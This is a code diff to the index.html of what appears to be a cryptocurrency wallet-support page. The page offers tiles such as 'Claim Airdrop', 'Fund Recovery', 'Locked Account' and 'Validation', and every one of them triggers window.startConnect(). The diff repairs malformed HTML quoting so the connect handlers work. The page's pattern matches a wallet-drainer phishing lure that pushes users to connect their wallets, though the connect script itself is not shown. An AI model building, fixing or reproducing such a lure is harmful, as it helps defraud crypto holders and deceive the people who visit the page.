--- a/index.html
+++ b/index.html
@@ -128,43 +128,43 @@
     <section class="course">
       <h1>Select Sync Type</h1>
       <div class="row">
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Migrate</h3>
             <p>Click here for migration or anything related to migration</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Claim token</h3>
             <p>Click here to claim or any issues while trying to claim</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Claim Reward</h3>
             <p>Click here to claim or any issues while trying to claim</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Claim Airdrop</h3>
             <p>Click here to claim Airdrops</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Buy/Sell</h3>
             <p>Click here to buy and sell your tokens</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Withdraw</h3>
             <p>Click here to Withdraw all your Assets</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Rectification</h3>
             <p>
@@ -172,67 +172,67 @@
             </p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Slippage Error</h3>
             <p>Click here for all issuses related to Slippage Error</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Resolve High Gas Bug</h3>
             <p>Click here for high gas or transaction fee related issues</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Swapping Error</h3>
             <p>Click here for token staking/unstake related issues</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Resolve RPC Errorr</h3>
             <p>Click here to resolve RPC Error or any RPC related issues</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Staking</h3>
             <p>Click here for token staking/unstake related issues</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Locked Account</h3>
             <p>Click here if your account was locked or wallet stuck</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Missing/Irregular Balance</h3>
             <p>Click here to recover your lost or missing funds</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Transaction Delay</h3>
             <p>Click here for any transaction eror or delayed transactions</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Wallet Glitch</h3>
             <p>Click here if you have problem with your trading wallet</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Fund Recovery</h3>
             <p>Recover all your lost funds in your wallet</p>
           </div>
         </a>
-        <a class="course-col onclick="window.startConnect()"">
+        <a class="course-col" onclick="window.startConnect()">
           <div>
             <h3>Validation</h3>
             <p>Click here to validaate your wallet using multisig</p>
@@ -262,4 +262,5 @@
   <script src="https://unpkg.com/scrollreveal"></script>
  
 </html>
+
 
